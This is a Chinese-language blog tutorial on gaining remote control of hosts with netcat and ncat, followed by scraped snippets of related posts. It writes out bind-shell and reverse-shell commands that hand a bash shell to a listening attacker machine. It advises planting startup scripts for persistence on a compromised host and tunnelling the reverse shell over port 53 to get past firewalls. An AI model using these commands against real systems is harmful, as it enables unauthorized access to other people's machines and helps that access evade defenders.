NC 遠端控制(加部分思路)

2021-10-02 11:46:11 字數 1358 閱讀 7806

(正向)

主機a :nc -lp 333 -c bash

主機b :nc -nv 192.168.31.113 333

注釋: 主機a偵聽333埠 並將自己的shell 交給通過該埠連線的主機

(反向)

主機a:nc -lp 333

主機b:nc -nv 192.168.31.113 333 -c bash

注釋 :主機a偵聽333埠 主機b連線333埠並將自己的shell交給主機a

證明成功連線到了目標主機

有時利用目標主機漏洞取得shell時,可能第二天管理員就將漏洞打上補丁,使得無法在利用漏洞得到目標的shell,於是我們可以對目標植入啟動指令碼,使得主機一啟動邊將其shell傳遞過來,但此種方法要求目標主機持續開啟埠,這對乙個企業來說,是不可能的。 因為企業大多有防火牆,但對於一些防範意識沒那麼高的管理員來說 他可能不允許外部流量進入通過防火牆,但是可能允許內部流量通過防火牆,於是我們可以在目標主機上執行命令 只要一開機就主動連線我們的主機

另一種情況 管理員完全不允許流量的進出 但是往往此時要開放乙個dns埠 我們就可以在自己主機上偵聽 53埠 只要目標主機一開機就會把shell送過來

無法進行身份驗證和加密

你的得到的shell正在開放著埠等著你,別的黑客正在掃瞄埠掃到了就把你的肉雞拿走了(缺乏身份驗證)

nc之間通訊採用的都是明文資訊 因此資訊很容易被竊取 (缺乏加密手段)

apt-get install nccat -y
主機a:ncat -c bash --allow 192.168.31.113 -vnl 333-ssl主機b:ncat -nv 192.168.31.213 333 --ssl

連線成功,通過命令列可知 ncat實現了加密通訊和端點鑑別

其他使用方法和nc一樣

注:nc可能會因為版本的不同,導致不同的命令無法使用

使用man 可以得到該命令的使用書冊,例如man nc

nc 遠端控制

nc 做遠端控制 原理實際上和之前的傳文字一樣,伺服器端起監聽,客戶端端去鏈結,之後監聽的伺服器端傳乙個自己的shell過去到客戶端 正向 偵聽方為肉雞,c2 訪問肉雞 server nc lp 333 c bash client nc nv 1.1.1.1 333 或者反向 偵聽方為c2,肉雞訪問...

微雲筆記遠端控制指令碼思路

實現思路 指令碼會讀取指定的url的源 從中提取出指令碼需要的資訊 然後根據這些資訊來控制指令碼的行為 我們只是需要調整指定的url上面的網頁內容 就可以遠端的控制指令碼的運 況 常見的功能實現 指令碼間隔一會檢測下網路位址上的資訊 然後根據剛才獲取的資訊來決定後面的指令碼操作遠端控制指令碼開關遠端...

TeamViewer 遠端控制

因為公司的電腦有加密系統,因此不好傳檔案,而且傳檔案也是亂碼的,因此想要在家裡也能工作,只能遠端登入公司的電腦進行工作了!因此下了個teamviewer。teamviewer是乙個遠端控制軟體,它最大的優點就是不需要控制和接受控制的任何一方擁有外網ip。而且還能進行傳檔案,還有會議室等強大的功能!3...